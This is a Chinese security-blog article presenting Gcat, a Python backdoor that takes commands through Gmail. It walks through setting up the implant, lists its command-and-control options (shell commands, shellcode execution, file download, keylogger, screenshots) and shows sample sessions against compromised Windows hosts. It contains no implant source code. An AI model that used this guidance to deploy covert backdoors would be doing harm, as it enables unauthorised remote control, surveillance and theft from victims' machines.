Gcat：使用Gmail控制管理的Python后门

文中提及的部分技术可能带有一定攻击性，仅供安全学习和教学用途，禁止非法使用

Gcat是一款使用Gmail控制管理的Python隐形后门。因为之前看到牛人用微博对Linux进行管理，所以现如今看来已经没啥高大上的感觉，但是其衍生出的概念却是想当有趣的，如果其背后有着社区的支撑，以及新功能的开发，那么这绝对是一款强大的工具。

功能引导没有那么多。虽然你不能上传文件，但你可以执行shellcode，下载文件，截图。

作为一个概念，它是非常值得点赞的。通过E-Mail进行通信，虽说可能会被许多组织阻止，特别是Google Server。但是其明显比通过IRC进行通信显得低调得多。

设置

为了能正常工作，你需要：

1.一个Gmail账户（强烈建议使用专用账户，而不要选择使用个人账户）

2.打开位于账户安全设置下的“允许低安全应用”

这个repo包含两个文件：

gcat.py：用来向客户端列举和发布命令的脚本
implant.py：实际部署的后门

在这两个文件中将gmail_user和gmail_pwd变量的值替换为你早前准备好的账户和密码。

你大概想要使用Pyinstaller将implant.py编译为可执行文件

选项

Gcat
 
optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve
 
  -list                 List available clients
  -info                 Retrieve info on specified client
 
Commands:
  Commands to execute on an implant
 
  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

使用Gcat

一旦你在两个系统中完成Gcat后门的部署，你可以使用list命令检测可用的客户端

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

输出的UUID字符串为系统的唯一标识，以及运行的操作系统。

我们这就想系统发出一条命令：

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

这里，我们命令90b2cd83-cb36-52de-84ee-99db6ff41a11执行ipconfig /all命令，接着脚本输出的jobid可以让我们进行检索这条命令的输出。

接着，我们来看看到底输出了什么：

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv  
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
 
 
Windows IP Configuration
 
        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
 
-- SNIP --

即将迎来的新特性

1.多平台支持

2.上传文件命令

3.加密传输/模糊化

你可以在这里下载到Gcat

小编有话要讲

之前就看到过有牛人使用微博来管理Linux主机，但也仅限于一些常用的命令操作。

本文所介绍的工具，其思路很值得我们借鉴！

* 参考来源：darknet，译者/鸢尾